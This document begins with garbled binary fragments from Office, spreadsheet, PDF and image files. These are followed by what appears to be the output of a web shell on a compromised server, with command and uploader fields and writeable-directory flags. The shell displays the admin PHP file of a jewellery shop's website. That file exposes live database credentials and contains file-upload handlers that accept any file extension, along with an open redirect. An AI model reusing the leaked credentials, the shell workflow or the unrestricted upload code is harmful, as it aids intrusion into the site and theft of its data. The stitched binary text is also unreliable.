œ_#ÁÕ§TE NAŒ“KeÉ:”(åŽÖJÞùY’‚ñùž7; «]Û ý`8g“¯B© jd ÖÖ¸ðzÂœ¸¦4Ç3Kó^(ÍÖ¼ Õ€pvìwšõB4d f$Èü^0˜…åÌC$#2FŽÑ§±¦ÛZ/÷š&m£ñzÒÖ ’.Î]!Î;ƒ(Õ–¢d/—#Kª+tZyuÏB>NÛÖ†(¸ŒSà'³„Y˜´-_•¦¼´˜OlNK§¶ÒàŠˆTHµƒeTPå·fïM’…þuÏÍüp6دªE£åü‡ZØ'CKF#â«;‹eyO Qp„†l"ö1èíÙP ÏŒúl! BÝ2ñª•_VÁÉ÷3eu`–F¸ìI--ö<¿žë¯4õ캿¢)34Å{wMÉ2ÆÖFŸ¥` e9Ú¶¸P‡.”FÔï rY ‚²ÈTB,{ÛœéJ}«àQ4¹0Rû4D‚B§S‘ dO•v¾„™Sן¯3FeŸ™«+ÓâwH dÕÛÌì·P4ë&¥#rÜÉ Ù¦ê†ý·xòqk¯2,¹§™E\­ék‚×SᔏںÙ⺷ö£6…à ʾ qSá³Å|;àû}4Ÿ($â¹VY~óÍ!èÜÒŒËX½Ù1j‚VíÍŸš³+œ]«½g{_{/vµ½\¢¶vÉWKÿ:ñám½ ¥ S²x‘t ŽšÝÙÿÀÇ^ný PK   IW™k‚½÷ á  _rels/.relsUT dìd dìd dìd­’ÏNÃ0 ‡ï{ŠÈ÷ÕÝ@¡¥» ¤Ý*`%îÑ&QâÁöö‚J£ì°cœŸ¿|¶²ÙÆA½rL½wVE Šñ¶w­†çúay * 9Kƒw¬áÈ ¶ÕbóÄIîI]’Ê—4t"á1™ŽGJ…ìòMããH’±Å@æ…ZÆuYÞ`üÍ€jÂT;«!îì T} |Û7MoøÞ›ýÈNN<|v–í2ÄÜ¥ÏèšbË¢Ázó˜Ë )„"£O­Ï7ú{ZYÈ’yÞç#1'tuÉM?6o>Z´_å9›ëKÚ˜}?þ³žÏÌ·N>fµx PK    IWª½e  ¢ U  € word/document.xmlUT dìdPK    IWþË3” z  €J¢ word/settings.xmlUT dìdPK    IWC‡{š' ƒ  €¤ docProps/custom.xmlUT dìdPK    IW츱=Œ   €‡¥ [Content_Types].xmlUT dìdPK    IWV%ë±"   €U§ docProps/app.xmlUT dìdPK    IW€RŒ 3  €¶¨ docProps/core.xmlUT dìdPK    IWkòDn ô  €ª word/_rels/document.xml.relsUT dìdPK    IW ;$î   €Î« word/fontTable.xmlUT dìdPK    IW+åäz] ÷.  €ý¬ word/numbering.xmlUT dìdPK    IW¤2×r- ¿  €›° word/styles.xmlUT dìdPK    IWMFÒ ø  €´ word/header1.xmlUT dìdPK    IWF— T e  €· word/media/image1.jpegUT dìdPK    IW!Yéáå   €°Ë word/media/image2.pngUT dìdPK    IW°Àºë ú  €ÙÌ word/media/image3.pngUT dìdPK    IW$“†ª L  €Î word/footer1.xmlUT dìdPK    IWzaGôM   €ñÑ word/footer2.xmlUT dìdPK    IW–µ­âº P  €}Õ word/theme/theme1.xmlUT dìdPK    IW™k‚½÷ á €{Û _rels/.relsUT PK   ! bîh^   [Content_Types].xml ¢(   ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f› ˜q·ÃR4DáAJ¬h>€ãÚÇVßƹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØ Pk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦Ñ äEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þ ÿÿ PK   ! µU0#ô L _rels/.rels ¢(   ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu *&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›×–¦é ?ˆ9LìÒ™ÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðÉ‚‹¨Þ ÿÿ PK   ! Q48wÛ —  xl/workbook.xml¤UÙnâ0}iþ!cñ‡ *–¢AšVU×$dC¬&vÆv UÕŸë@XÊK§/¹p|Žï¹N÷b“¥Ö •Š ÞC¸î"‹òHÄŒ¯zèá~b·‘¥4á1I§=ôJºèÿüÑ] ù¼âÙ ®z(Ñ:GE ͈ª‹œrˆ,…̈†©\9*—”Ä*¡Tg©ã¹nàd„q´Eåg0ÄrÉ":Q‘Q®· ’¦D}•°\UhYô¸ŒÈç"·#‘å ±`)Ó¯%(²²(œ®¸d‘‚ì nZ w v¡ñª• t¶TÆ")”Xê:@;[Ògú±ë`|²›ó=ø’ïHúÂL÷¬dðEVÁ+8€a÷Ûh¬Uz%„Íû"ZsÏÍCýî’¥ôqk]‹äù5ÉL¦Rd¥Dé˘i÷P ¦bM/|dÉ",…¨çãFNoçiûéë>aêiçsó#ðÄ ÕTr¢éHp ÜIú®ÝJìQ"ÀÜÖ-ý[0I¡¦ÀZ Z…d¡nˆN¬B¦=4 g %PDF-1.4 %âãÏÓ 3 0 obj << /Linearized 1 /L 422775 ÿØÿà JFIF    ÿÛ C      ÿÛ C   ÿÀ  X" ÿÄ    ÿÄ H   !1A"Qaq2‘¡#±ÁBRÑ3Cbrá$S‚¢²ð4ñ%6DTc’ÂsÿÄ   ÿÄ =  !1AQ"aq‘Á2R¡±BÑð#3br’²4á$‚¢ÂñÿÚ   ? áHBßÝ`„! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! ! stream

___________________________ < root@rinduuu:~# /home/rinduuuuuuu?! > ___________________________

Command :
ikan Uploader :
Directory :  /home/ni05r7l36tus/www/poojajewellersbbsr.com/admin/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //home/ni05r7l36tus/www/poojajewellersbbsr.com/admin/function.php
<?php
// ================= Database Connection =================
ini_set('display_errors', 1);
error_reporting(E_ALL);

$host = 'localhost';
$db   = 'poojajeweller';
$user = 'poojajeweller_user';
$pass = 'Poojajeweller@12345#';
$charset = 'utf8mb4';

// $host = 'localhost';
// $db   = 'poojajeweller';
// $user = 'root';
// $pass = '';
// $charset = 'utf8mb4';
$dsn = "mysql:host=$host;dbname=$db;charset=$charset";
$options = [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    PDO::ATTR_EMULATE_PREPARES   => false,
];

try {
    $pdo = new PDO($dsn, $user, $pass, $options);
    if (session_status() == PHP_SESSION_NONE) session_start();
} catch (PDOException $e) {
    die("Database connection failed: " . htmlspecialchars($e->getMessage()));
}

// ================== SALE PRODUCT ==================
if (isset($_POST['add_sale_product'])) {
    $product_name = $_POST['product_name'];
    $metal_type = $_POST['metal_type'];
    $metal_purity = $_POST['metal_purity'];
    $weight = floatval($_POST['weight']);
    $net_weight = floatval($_POST['net_weight']);
    $dimensions = $_POST['dimensions'];
    $hallmark_certification = $_POST['hallmark_certification'];
    $making_charges = floatval($_POST['making_charges']);
    $mrp = floatval($_POST['mrp']);
    $price = floatval($_POST['price']);
    $discount_percentage = floatval($_POST['discount_percentage']);
    $tax_percentage = floatval($_POST['tax_percentage']);
    $stock_quantity = intval($_POST['stock_quantity']);
    $sku_code = $_POST['sku_code'];

    // Products table
    $stmt = $pdo->prepare("INSERT INTO products (product_name) VALUES (:product_name)");
    $stmt->execute([':product_name' => $product_name]);
    $product_id = $pdo->lastInsertId();

    // Gold/Silver table
    $stmt = $pdo->prepare("
        INSERT INTO product_gold_silver
        (product_id, metal_type, metal_purity, weight, net_weight, dimensions, hallmark_certification)
        VALUES (:product_id, :metal_type, :metal_purity, :weight, :net_weight, :dimensions, :hallmark_certification)
    ");
    $stmt->execute(compact('product_id','metal_type','metal_purity','weight','net_weight','dimensions','hallmark_certification'));

    // Sales table
    $stmt = $pdo->prepare("
        INSERT INTO product_sales
        (product_id, making_charges, mrp, price, discount_percentage, tax_percentage, stock_quantity, sku_code)
        VALUES (:product_id, :making_charges, :mrp, :price, :discount_percentage, :tax_percentage, :stock_quantity, :sku_code)
    ");
    $stmt->execute(compact('product_id','making_charges','mrp','price','discount_percentage','tax_percentage','stock_quantity','sku_code'));

    header("Location: product.php"); exit;
}

if (isset($_POST['update_sale_product'])) {
    $product_id = intval($_POST['product_id']);
    $product_name = $_POST['product_name'];
    $metal_type = $_POST['metal_type'];
    $metal_purity = $_POST['metal_purity'];
    $weight = floatval($_POST['weight']);
    $net_weight = floatval($_POST['net_weight']);
    $dimensions = $_POST['dimensions'];
    $hallmark_certification = $_POST['hallmark_certification'];
    $making_charges = floatval($_POST['making_charges']);
    $mrp = floatval($_POST['mrp']);
    $price = floatval($_POST['price']);
    $discount_percentage = floatval($_POST['discount_percentage']);
    $tax_percentage = floatval($_POST['tax_percentage']);
    $stock_quantity = intval($_POST['stock_quantity']);
    $sku_code = $_POST['sku_code'];

    // Update products
    $stmt = $pdo->prepare("UPDATE products SET product_name=:product_name WHERE product_id=:product_id");
    $stmt->execute([':product_name'=>$product_name, ':product_id'=>$product_id]);

    // Update gold/silver
    $stmt = $pdo->prepare("
        UPDATE product_gold_silver SET metal_type=:metal_type, metal_purity=:metal_purity, weight=:weight, net_weight=:net_weight, dimensions=:dimensions, hallmark_certification=:hallmark_certification
        WHERE product_id=:product_id
    ");
    $stmt->execute(compact('metal_type','metal_purity','weight','net_weight','dimensions','hallmark_certification','product_id'));

    // Update sales
    $stmt = $pdo->prepare("
        UPDATE product_sales SET making_charges=:making_charges, mrp=:mrp, price=:price, discount_percentage=:discount_percentage, tax_percentage=:tax_percentage, stock_quantity=:stock_quantity, sku_code=:sku_code
        WHERE product_id=:product_id
    ");
    $stmt->execute(compact('making_charges','mrp','price','discount_percentage','tax_percentage','stock_quantity','sku_code','product_id'));

    header("Location: product.php"); exit;
}

// ================== RENTAL PRODUCT ==================
if (isset($_POST['add_rental_product'])) {
    $product_name = $_POST['product_name'];
    $tag_number = $_POST['tag_number'];
    $material_description = $_POST['material_description'];
    $stone_weight = floatval($_POST['stone_weight']);
    $stone_count = intval($_POST['stone_count']);
    $stone_color = $_POST['stone_color'];
    $rental_amount = floatval($_POST['rental_amount']);
    $depositation_amount = floatval($_POST['deposit_amount']);
    $rental_duration = $_POST['rental_duration'];
    $late_fee = floatval($_POST['late_fee']);

    // Products
    $stmt = $pdo->prepare("INSERT INTO products (product_name) VALUES (:product_name)");
    $stmt->execute([':product_name' => $product_name]);
    $product_id = $pdo->lastInsertId();

    // Rentals
    $stmt = $pdo->prepare("
        INSERT INTO product_rentals
        (product_id, rental_amount, deposit_amount, rental_duration, late_fee)
        VALUES (:product_id, :rental_amount, :deposit_amount, :rental_duration, :late_fee)
    ");
    $stmt->execute(compact('product_id','rental_amount','deposit_amount','rental_duration','late_fee'));

    // Fancy
    $stmt = $pdo->prepare("
        INSERT INTO product_fancy
        (product_id, material_description, stone_weight, stone_count, stone_color)
        VALUES (:product_id, :material_description, :stone_weight, :stone_count, :stone_color)
    ");
    $stmt->execute(compact('product_id','material_description','stone_weight','stone_count','stone_color'));

    header("Location: product.php"); exit;
}

if (isset($_POST['update_rental_product'])) {
    $product_id = intval($_POST['product_id']);
    $product_name = $_POST['product_name'];
    $tag_number = $_POST['tag_number'];
    $material_description = $_POST['material_description'];
    $stone_weight = floatval($_POST['stone_weight']);
    $stone_count = intval($_POST['stone_count']);
    $stone_color = $_POST['stone_color'];
    $rental_amount = floatval($_POST['rental_amount']);
    $deposit_amount = floatval($_POST['deposit_amount']);
    $rental_duration = $_POST['rental_duration'];
    $late_fee = floatval($_POST['late_fee']);

    // Update products
    $stmt = $pdo->prepare("UPDATE products SET product_name=:product_name WHERE product_id=:product_id");
    $stmt->execute([':product_name'=>$product_name, ':product_id'=>$product_id]);

    // Update rentals
    $stmt = $pdo->prepare("
        UPDATE product_rentals SET rental_amount=:rental_amount, deposit_amount=:deposit_amount, rental_duration=:rental_duration, late_fee=:late_fee
        WHERE product_id=:product_id
    ");
    $stmt->execute(compact('rental_amount','deposit_amount','rental_duration','late_fee','product_id'));

    // Update fancy
    $stmt = $pdo->prepare("
        UPDATE product_fancy SET material_description=:material_description, stone_weight=:stone_weight, stone_count=:stone_count, stone_color=:stone_color
        WHERE product_id=:product_id
    ");
    $stmt->execute(compact('material_description','stone_weight','stone_count','stone_color','product_id'));

    header("Location: product.php"); exit;
}

include 'connection/config.php';


// ---------------- ADD AUSPCIOUS ----------------
if (isset($_POST['add_auspicious'])) {
    $title = $_POST['auspicious_title'] ?? '';
    $date  = $_POST['auspicious_date'] ?? '';
    $icon  = "";

    // Handle file upload
    if (!empty($_FILES['auspicious_icon']['name'])) {
        $uploadDir = __DIR__ . "/../uploads/icon/";
        if (!is_dir($uploadDir)) {
            mkdir($uploadDir, 0777, true);
        }

        $fileName   = time() . "_" . basename($_FILES['auspicious_icon']['name']);
        $icon       = "uploads/icon/" . $fileName; // relative path for DB
        $targetFile = $uploadDir . $fileName;

        if (!move_uploaded_file($_FILES['auspicious_icon']['tmp_name'], $targetFile)) {
            echo "<p style='color:red'>⚠️ File upload failed for Auspicious Day.</p>";
            $icon = "";
        }
    }

    if ($title && $icon && $date) {
        try {
            $stmt = $pdo->prepare("INSERT INTO auspicious_days (title, icon, day_date) VALUES (:title, :icon, :day_date)");
            $stmt->execute([
                ':title'    => $title,
                ':icon'     => $icon,
                ':day_date' => $date
            ]);

            header("Location: aspicious.php");
            exit;

        } catch (PDOException $e) {
            echo "<p style='color:red'>⚠️ Database error: " . $e->getMessage() . "</p>";
        }
    } else {
        echo "<p style='color:red'>⚠️ Please provide Title, Icon and Date for Auspicious Day.</p>";
    }
}

// ---------------- UPDATE AUSPCIOUS ----------------
if (isset($_POST['update_auspicious']) && isset($_POST['id'])) {
    $id    = (int)$_POST['id'];
    $title = $_POST['auspicious_title'] ?? '';
    $date  = $_POST['auspicious_date'] ?? '';

    // Fetch existing icon
    $stmt = $pdo->prepare("SELECT icon FROM auspicious_days WHERE id = ?");
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    $icon = $row['icon'] ?? '';

    // Handle new file upload
    if (!empty($_FILES['auspicious_icon']['name'])) {
        $uploadDir = __DIR__ . "/../uploads/icon/";
        if (!is_dir($uploadDir)) {
            mkdir($uploadDir, 0777, true);
        }

        $fileName   = time() . "_" . basename($_FILES['auspicious_icon']['name']);
        $newIcon    = "uploads/icon/" . $fileName;
        $targetFile = $uploadDir . $fileName;

        if (move_uploaded_file($_FILES['auspicious_icon']['tmp_name'], $targetFile)) {
            // Delete old file if exists
            if ($icon && file_exists(__DIR__ . '/' . $icon)) {
                unlink(__DIR__ . '/' . $icon);
            }
            $icon = $newIcon;
        }
    }

    if ($title && $date) {
        try {
            $stmt = $pdo->prepare("UPDATE auspicious_days SET title = :title, day_date = :day_date, icon = :icon WHERE id = :id");
            $stmt->execute([
                ':title'    => $title,
                ':day_date' => $date,
                ':icon'     => $icon,
                ':id'       => $id
            ]);

            header("Location: aspicious.php");
            exit;

        } catch (PDOException $e) {
            echo "<p style='color:red'>⚠️ Database error: " . $e->getMessage() . "</p>";
        }
    } else {
        echo "<p style='color:red'>⚠️ Please provide Title and Date for Auspicious Day.</p>";
    }
}

// ======================= DELETE =======================
if (isset($_GET['delete_auspicious'])) {
    $id = (int)$_GET['delete_auspicious'];

    // Fetch existing icon
    $stmt = $pdo->prepare("SELECT icon FROM auspicious_days WHERE id = ?");
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Delete icon file
    if (!empty($row['icon']) && file_exists(__DIR__ . '/' . $row['icon'])) {
        unlink(__DIR__ . '/' . $row['icon']);
    }

    // Delete record
    $stmt = $pdo->prepare("DELETE FROM auspicious_days WHERE id = ?");
    $stmt->execute([$id]);

    header("Location:aspicious.php");
    exit;
}
   
// ---------- ADD BLOG ----------

$uploadDirblog = __DIR__ . "/../uploads/blog/";
if (!file_exists($uploadDirblog)) {
    mkdir($uploadDirblog, 0777, true);
}
if (isset($_POST['add_blog'])) {
    $title         = htmlspecialchars($_POST['title'] ?? '');
    $publish_date     = htmlspecialchars($_POST['publish_date'] ?? '');
    $author        = htmlspecialchars($_POST['author'] ?? '');
    $allowed_tags = '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>';
    $description = strip_tags($_POST['description'] ?? '', $allowed_tags);
    $slug          = htmlspecialchars($_POST['slug'] ?? '');
    $keyword       = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle     = htmlspecialchars($_POST['meta_title'] ?? '');
    $metadescription= htmlspecialchars($_POST['meta_description'] ?? '');

    // Image Upload (optional)
$image = null;
if (!empty($_FILES['image']['name'])) {
    $imageTmp = $_FILES['image']['tmp_name'];
    $imageExt = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));

    // Use blog title or fallback to "blog"
    $seoName = !empty($_POST['slug']) 
        ? preg_replace('/[^a-z0-9]+/i', '-', strtolower($_POST['slug'])) 
        : 'blog';
    $seoName = trim($seoName, '-');

    // Final name: blog-title.webp (no random numbers)
    $newName  = 'blog-' . $seoName . '.webp';
    $destPath = $uploadDirblog . $newName;

    switch ($imageExt) {
        case 'jpg':
        case 'jpeg':
            $src = imagecreatefromjpeg($imageTmp);
            break;
        case 'png':
            $src = imagecreatefrompng($imageTmp);
            imagepalettetotruecolor($src);
            imagealphablending($src, true);
            imagesavealpha($src, true);
            break;
        case 'gif':
            $src = imagecreatefromgif($imageTmp);
            break;
        case 'webp':
            $src = imagecreatefromwebp($imageTmp);
            break;
        default:
            $src = false;
    }

    if ($src !== false) {
        imagewebp($src, $destPath, 80);
        imagedestroy($src);
        $image = $newName;
    }
}


    try {
        $stmt = $pdo->prepare("
            INSERT INTO `blog`
            (`title`, `image`, `publish_date`, `author`, 
             `description`,`slug`, `meta_keyword`, `meta_title`, `meta_description`)
            VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)
        ");

        $stmt->execute([
            $title,
            $image,
            $publish_date,
            $author,
            $description,
            $slug,
            $keyword,
            $metatitle,
            $metadescription
        ]);

        header("Location: blog.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}

// ---------- UPDATE BLOG ----------
if (isset($_POST['update_blog'])) {
    $id            = intval($_POST['id']);
    $title         = htmlspecialchars($_POST['title'] ?? '');
    $publish_date  = htmlspecialchars($_POST['publish_date'] ?? '');
    $author        = htmlspecialchars($_POST['author'] ?? '');
    $allowed_tags  = '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>';
    $description   = strip_tags($_POST['description'] ?? '', $allowed_tags);
    $slug          = htmlspecialchars($_POST['slug'] ?? '');
    $keyword       = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle     = htmlspecialchars($_POST['meta_title'] ?? '');
    $metadescription = htmlspecialchars($_POST['meta_description'] ?? '');

    // Fetch old image (in case new one is not uploaded)
$stmt = $pdo->prepare("SELECT image FROM blog WHERE id = ?");
$stmt->execute([$id]);
$oldImage = $stmt->fetchColumn();

$image = $oldImage;
// If new image uploaded → replace
if (!empty($_FILES['image']['name'])) {
    $imageTmp = $_FILES['image']['tmp_name'];
    $imageExt = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));

    // Create SEO-friendly name
    $seoName = !empty($_POST['slug']) 
        ? preg_replace('/[^a-z0-9]+/i', '-', strtolower($_POST['slug'])) 
        : (!empty($_POST['title']) 
            ? preg_replace('/[^a-z0-9]+/i', '-', strtolower($_POST['title'])) 
            : 'blog');
    $seoName = trim($seoName, '-');

    $newName  = 'blog-' . $seoName . '.webp';
    $destPath = $uploadDirblog . $newName;

    switch ($imageExt) {
        case 'jpg':
        case 'jpeg':
            $src = imagecreatefromjpeg($imageTmp);
            break;
        case 'png':
            $src = imagecreatefrompng($imageTmp);
            imagepalettetotruecolor($src);
            imagealphablending($src, true);
            imagesavealpha($src, true);
            break;
        case 'gif':
            $src = imagecreatefromgif($imageTmp);
            break;
        case 'webp':
            $src = imagecreatefromwebp($imageTmp);
            break;
        default:
            $src = false;
    }

    if ($src !== false) {
        if (imagewebp($src, $destPath, 80)) {
            $image = $newName;
        }
        imagedestroy($src);

        // Delete only if different filename
        if ($oldImage && $oldImage !== $newName && file_exists($uploadDirblog . $oldImage)) {
            unlink($uploadDirblog . $oldImage);
        }
    }
}


    try {
        $stmt = $pdo->prepare("
            UPDATE `blog` SET 
                `title` = ?, 
                `image` = ?, 
                `publish_date` = ?, 
                `author` = ?, 
                `description` = ?, 
                `slug` = ?, 
                `meta_keyword` = ?, 
                `meta_title` = ?, 
                `meta_description` = ?
            WHERE `id` = ?
        ");
        $stmt->execute([
            $title,
            $image,
            $publish_date,
            $author,
            $description,
            $slug,
            $keyword,
            $metatitle,
            $metadescription,
            $id
        ]);

        header("Location: blog.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}
// ---------- DELETE BLOG ----------
if (isset($_GET['delete_blog'])) {
    $id = (int)$_GET['delete_blog'];
    $stmtImg = $pdo->prepare("SELECT image FROM blog WHERE id=?");
    $stmtImg->execute([$id]);
    $imagePath = $stmtImg->fetchColumn();

    if ($imagePath) {
        $fullPath = $uploadDirblog . $imagePath;
        if (file_exists($fullPath)) {
            if (unlink($fullPath)) {
                // echo "Image deleted: " . $fullPath;
            } else {
                echo "Failed to delete image: " . $fullPath;
            }
        } else {
            echo "Image not found at: " . $fullPath;
        }
    }
    try {
        $stmt = $pdo->prepare("DELETE FROM blog WHERE id=?");
        $stmt->execute([$id]);

        header("Location: blog.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}



//----------------------------------------------------------
// Add Banner
//----------------------------------------------------------
if (isset($_POST['add_banner'])) {
    $title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : "";

    $image_name = null;
    if (!empty($_FILES['image']['name'])) {
        $dir = "../uploads/banner/";
        if (!is_dir($dir)) {
            mkdir($dir, 0777, true);
        }

        $image = $_FILES['image']['name'];
        $image_tmp = $_FILES['image']['tmp_name'];
        $image_extn = pathinfo($image, PATHINFO_EXTENSION);
        $image_name = rand(10, 100) . time() . '.' . $image_extn;

        if (!move_uploaded_file($image_tmp, $dir . $image_name)) {
            die("ERROR: File not uploaded. Try again.");
        }
    }

    $stmt = $pdo->prepare("INSERT INTO `banner` (`title`, `image`) VALUES (:title, :image)");
    $stmt->execute(['title' => $title, 'image' => $image_name]);

    header("Location: banner.php");
    exit();
}

//----------------------------------------------------------
// Update Banner
//----------------------------------------------------------
if (isset($_POST['update_banner'])) {
    $id = intval($_POST['id']);
    $title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : "";

    if (!empty($_FILES['image']['name'])) {
        $dir = "../uploads/banner/";
        if (!is_dir($dir)) {
            mkdir($dir, 0777, true);
        }

        $image = $_FILES['image']['name'];
        $image_tmp = $_FILES['image']['tmp_name'];
        $image_extn = pathinfo($image, PATHINFO_EXTENSION);
        $image_name = rand(10, 100) . time() . '.' . $image_extn;

        if (!move_uploaded_file($image_tmp, $dir . $image_name)) {
            die("ERROR: File not uploaded. Try again.");
        }
    } else {
        $image_name = $_POST['hidden_image']; // keep old image if not updated
    }

    $stmt = $pdo->prepare("UPDATE `banner` SET `title` = :title, `image` = :image WHERE `id` = :id");
    $stmt->execute(['title' => $title, 'image' => $image_name, 'id' => $id]);

    header("Location: banner.php");
    exit();
}

//----------------------------------------------------------
// Delete Banner
//----------------------------------------------------------
if (isset($_GET['action']) && $_GET['action'] == 'delete_banner') {
    $id = intval($_GET['id']);

    $stmt = $pdo->prepare("SELECT `image` FROM `banner` WHERE `id` = :id");
    $stmt->execute(['id' => $id]);
    $row = $stmt->fetch();

    if ($row && file_exists("../uploads/banner/" . $row['image'])) {
        unlink("../uploads/banner/" . $row['image']);
    }

    $stmt = $pdo->prepare("DELETE FROM `banner` WHERE `id` = :id");
    $stmt->execute(['id' => $id]);

    header("Location: banner.php");
    exit();
}


//----------------------------------------------------------
// Add Instaphoto
//----------------------------------------------------------
if (isset($_POST['add_instaphoto'])) {
    $title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : "";

    $image_name = null;
    if (!empty($_FILES['image']['name'])) {
        $dir = "../uploads/instaphoto/";
        if (!is_dir($dir)) {
            mkdir($dir, 0777, true);
        }

        $image = $_FILES['image']['name'];
        $image_tmp = $_FILES['image']['tmp_name'];
        $image_extn = pathinfo($image, PATHINFO_EXTENSION);
        $image_name = rand(10, 100) . time() . '.' . $image_extn;

        if (!move_uploaded_file($image_tmp, $dir . $image_name)) {
            die("ERROR: File not uploaded. Try again.");
        }
    }

    $stmt = $pdo->prepare("INSERT INTO `instaphoto` (`title`, `image`) VALUES (:title, :image)");
    $stmt->execute(['title' => $title, 'image' => $image_name]);

    header("Location: instaphoto.php");
    exit();
}

//----------------------------------------------------------
// Update Instaphoto
//----------------------------------------------------------
if (isset($_POST['update_instaphoto'])) {
    $id = intval($_POST['id']);
    $title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : "";

    if (!empty($_FILES['image']['name'])) {
        $dir = "../uploads/instaphoto/";
        if (!is_dir($dir)) {
            mkdir($dir, 0777, true);
        }

        $image = $_FILES['image']['name'];
        $image_tmp = $_FILES['image']['tmp_name'];
        $image_extn = pathinfo($image, PATHINFO_EXTENSION);
        $image_name = rand(10, 100) . time() . '.' . $image_extn;

        if (!move_uploaded_file($image_tmp, $dir . $image_name)) {
            die("ERROR: File not uploaded. Try again.");
        }
    } else {
        $image_name = $_POST['hidden_image']; // keep old image if not updated
    }

    $stmt = $pdo->prepare("UPDATE `instaphoto` SET `title` = :title, `image` = :image WHERE `id` = :id");
    $stmt->execute(['title' => $title, 'image' => $image_name, 'id' => $id]);

    header("Location: instaphoto.php");
    exit();
}

//----------------------------------------------------------
// Delete Instaphoto
//----------------------------------------------------------
if (isset($_GET['action']) && $_GET['action'] == 'delete_instaphoto' && isset($_GET['id'])) {

    $id = intval($_GET['id']); // Get the ID safely
    $redirect = isset($_GET['redirect']) ? $_GET['redirect'] : 'instaphoto.php';

    // Fetch the specific image for this ID
    $stmt = $pdo->prepare("SELECT `image` FROM `instaphoto` WHERE `id` = :id LIMIT 1");
    $stmt->execute(['id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row && !empty($row['image'])) {
        $filePath = "../uploads/instaphoto/" . $row['image'];
        if (file_exists($filePath)) {
            unlink($filePath); // Delete the file
        }
    }

    // Delete only the specific record
    $stmt = $pdo->prepare("DELETE FROM `instaphoto` WHERE `id` = :id LIMIT 1");
    $stmt->execute(['id' => $id]);

    // Redirect back to the page
    header("Location: $redirect");
    exit();
}

//----------------------------------------------------------
// Update store location 
//----------------------------------------------------------
if (isset($_POST['update_store'])) {

    $id = intval($_POST['id']); // store ID
    $store_name = trim($_POST['store_name'] ?? '');
    $phone1     = trim($_POST['phone1'] ?? '');
    $phone2     = trim($_POST['phone2'] ?? '');
    $email1     = trim($_POST['email1'] ?? '');
    $email2     = trim($_POST['email2'] ?? '');
    $facebook   = trim($_POST['facebook'] ?? '');
    $instagram  = trim($_POST['instagram'] ?? '');
    $youtube    = trim($_POST['youtube'] ?? '');
    $telegram   = trim($_POST['telegram'] ?? '');
    $address1   = trim($_POST['address1'] ?? '');
    $address2   = trim($_POST['address2'] ?? '');
    $opentime   = trim($_POST['opentime'] ?? '');
    $closetime  = trim($_POST['closetime'] ?? '');
    $map1       = trim($_POST['map1'] ?? '');
    $map2       = trim($_POST['map2'] ?? '');

    // PDO Update
    $stmt = $pdo->prepare("UPDATE store_locations SET 
        store_name = :store_name,
        phone1 = :phone1,
        phone2 = :phone2,
        email1 = :email1,
        email2 = :email2,
        facebook = :facebook,
        instagram = :instagram,
        youtube = :youtube,
        telegram = :telegram,
        address1 = :address1,
        address2 = :address2,
        opentime = :opentime,
        closetime = :closetime,
        map1 = :map1,
        map2 = :map2
        WHERE id = :id
    ");

    $success = $stmt->execute([
        ':store_name' => $store_name,
        ':phone1'     => $phone1,
        ':phone2'     => $phone2,
        ':email1'     => $email1,
        ':email2'     => $email2,
        ':facebook'   => $facebook,
        ':instagram'  => $instagram,
        ':youtube'    => $youtube,
        ':telegram'   => $telegram,
        ':address1'   => $address1,
        ':address2'   => $address2,
        ':opentime'   => $opentime,
        ':closetime'  => $closetime,
        ':map1'       => $map1,
        ':map2'       => $map2,
        ':id'         => $id
    ]);

    if ($success) {
        header("Location: store-location.php");
        exit();
    } else {
        echo "Store settings not updated.";
    }
}



//----------------------------------------------------------
// Add Tax
//----------------------------------------------------------
if (isset($_POST['add_tax'])) {
    $tax_name = !empty($_POST['tax_name']) ? htmlspecialchars(trim($_POST['tax_name'])) : "";
